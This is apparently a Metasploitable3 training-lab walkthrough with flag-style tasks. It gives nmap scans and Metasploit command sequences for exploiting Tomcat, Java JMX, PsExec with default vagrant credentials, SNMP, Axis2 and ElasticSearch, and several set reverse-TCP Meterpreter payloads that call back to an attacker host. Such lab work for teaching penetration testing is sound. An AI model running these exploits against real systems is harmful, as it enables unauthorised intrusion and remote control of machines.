Welcome to the Metasploitable3 Lab

Welcome to the Metasploitable3 lab! Within this environment, you'll find two vulnerable machines, Windows 2008 and Linux, both purposefully designed with vulnerabilities for you to discover, exploit, and learn.

In this lab, we'll start with the Windows 2008 machine, guiding you through its vulnerabilities. Afterward, you'll have the opportunity to challenge yourself with the Linux machine on your own. Make sure to refer to the Vulnerabilities Wiki for a comprehensive list of known vulnerabilities and to the Credentials Wiki for the list of credentials you might need.

Kali => 203.0.113.9/24

Ubuntu 14.04 => 192.168.1.4/24

Windows 2008 machine => 192.168.1.5/24

💡 Note: You have direct access to all machines in this lab.
Feel free to explore, troubleshoot, and fix issues as you go.

Happy hacking!

Let's start by familiarizing with the target network by conducting a progressive nmap scan on the Metasploitable3 machines.

1. Quick Ping Sweep

Before diving deeper, identify which hosts are alive in the network.

nmap -sn 192.168.1.4-5

2. Fast Scan

Conduct a quick scan of the most common ports. This will give you a quick overview without delving too deeply:

nmap -F 192.168.1.4-5

3. Service Version Detection

Identify the services running on the open ports. This will be crucial when considering potential exploits:

nmap -sV 192.168.1.4-5

4. Standard OS Detection Scan

Try to determine the operating system of the target machines:

nmap -O 192.168.1.4-5

5. Aggressive OS Detection Scan

This makes nmap be more aggressive in guessing the operating system. When nmap is unsure about the OS, it will usually provide several possible matches:

nmap -O --osscan-guess 192.168.1.4-5

6. Full Scan with Scripting

This is a more aggressive scan that will attempt to scan all common ports -F, gather version details, run default scripts, and determine the operating system.

Be aware this scan will take more time than the previous scans:

nmap -F -T4 -A 192.168.1.4-5

To scan all common ports -p-:

nmap -p- -T4 -A 192.168.1.4-5

As you go through these scans, take note of the open ports, services, and any other interesting details. These insights will be crucial for the next steps in your penetration testing journey.

Keep up the good work!

Let's start 1st hack by exploiting the Apache Tomcat vulnerabilities (CVE-2009-3843, CVE-2009-4189) on the target machine using Metasploit. Successfully exploiting these vulnerabilities will allow unauthorized control over the system.

Task:

Extract Tomcat version ? Answer Format: 8.x.xx

Answer:

To complete this task, follow these steps:

1. Open Metasploit

   Initiate the Metasploit console by typing msfconsole in your terminal.

2. Choose the appropriate exploit

   For this task, we will use the tomcat_mgr_upload exploit. To do so, input the following command in the Metasploit console:

use exploit/multi/http/tomcat_mgr_upload

3. Set the target host & port

   The target of your attack is the remote host. Set the IP of the remote host with this command:

set RHOSTS 192.168.1.5
set RPORT 8282

4. Set Creddential and Target URL

set HttpUsername sploit
set HttpPassword sploit
set TARGETURI /manager

5. Launch the exploit

   Now, you can run the exploit using the following simple command:

run

By completing these steps, you will successfully exploit the Apache Tomcat vulnerabilities on the target machine.

Keep up the good work!

This task requires you to exploit a vulnerable Java JMX (Java Management Extensions) server. The objective is to gain unauthorized access to the system.

Task:

Extract the value of the file C:\Program Files\jmx\flag.txt

Answer:

1. Launch the Metasploit console with msfconsole.

2. Use the following sequence of commands:

use exploit/multi/misc/java_jmx_server
set RHOSTS 192.168.1.5
set RPORT 1617
run

This sequence of steps will guide you to successfully exploit the Java JMX server on the target system.

Keep up the good work!

In this task, use Metasploit to exploit a Windows system vulnerability via PsExec service. This exploit can lead to system level control over the target.

Task:

Extract the value of the file c:\flag.txt

Answer:

1. Launch the Metasploit console with msfconsole.

2. Use the following sequence of commands:

use exploit/windows/smb/psexec
set RHOSTS 192.168.1.5
set SMBUser vagrant
set SMBPass vagrant
set LHOST 10.0.1.5
run

In this example, we're assuming that you have valid credentials (vagrant:vagrant) for the target system.

Keep up the good work!

Your goal in this task is to use the Simple Network Management Protocol (SNMP) to enumerate information about the target system using Metasploit. Successfully performing this operation can reveal useful information about the target, which could potentially aid in exploiting other vulnerabilities.

Task:

Extract sshd.exe service path ? Answer Format: C:\Program Files\xxxxxxx\xxx\xxxx\

Answer:

1. Launch the Metasploit console with msfconsole.

2. Use the following sequence of commands:

use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 192.168.1.5
set COMMUNITY public
run

Keep in mind, enumeration should be conducted ethically and only on systems where you have been given explicit permission.

Keep up the good work!

Your task is to exploit a vulnerability in Apache Axis2, specifically CVE-2010-0219, using Metasploit. This vulnerability could allow you to deploy a malicious web service on the target system and gain control over it.

Task:

Extract Tomcat version ? Answer Format: 8.x.xx

Answer:

1. Launch the Metasploit console with msfconsole.

2. Use the following sequence of commands:

use exploit/multi/http/axis2_deployer
set RHOSTS 192.168.1.5
set RPORT 8282
set payload java/meterpreter/reverse_tcp
set LHOST 10.0.1.5
set LPORT 4444
exploit

These commands will exploit the Axis2 vulnerability and establish a Meterpreter session with the target system if successful.

Please continue your ethical hacking journey with respect and integrity. Exploit systems only where you have explicit permission to do so.

Keep up the good work!

In this task, you are to exploit a vulnerability in ElasticSearch, specifically CVE-2014-3120, using Metasploit. This vulnerability could allow you to execute arbitrary code remotely on the target system, effectively gaining control over it.

Task:

Extract ElasticSearch version ? Answer Format: 1.x.x

Answer:

1. Launch the Metasploit console with msfconsole.

2. Use the following sequence of commands:

use exploit/multi/elasticsearch/script_mvel_rce
set RHOSTS 192.168.1.5
set RPORT 9200
set payload java/meterpreter/reverse_tcp
set LHOST 10.0.1.5
set LPORT 4444
exploit

These commands will exploit the ElasticSearch vulnerability and establish a Meterpreter session with the target system if successful.

Exploit systems only with explicit permission.

Keep up the great work!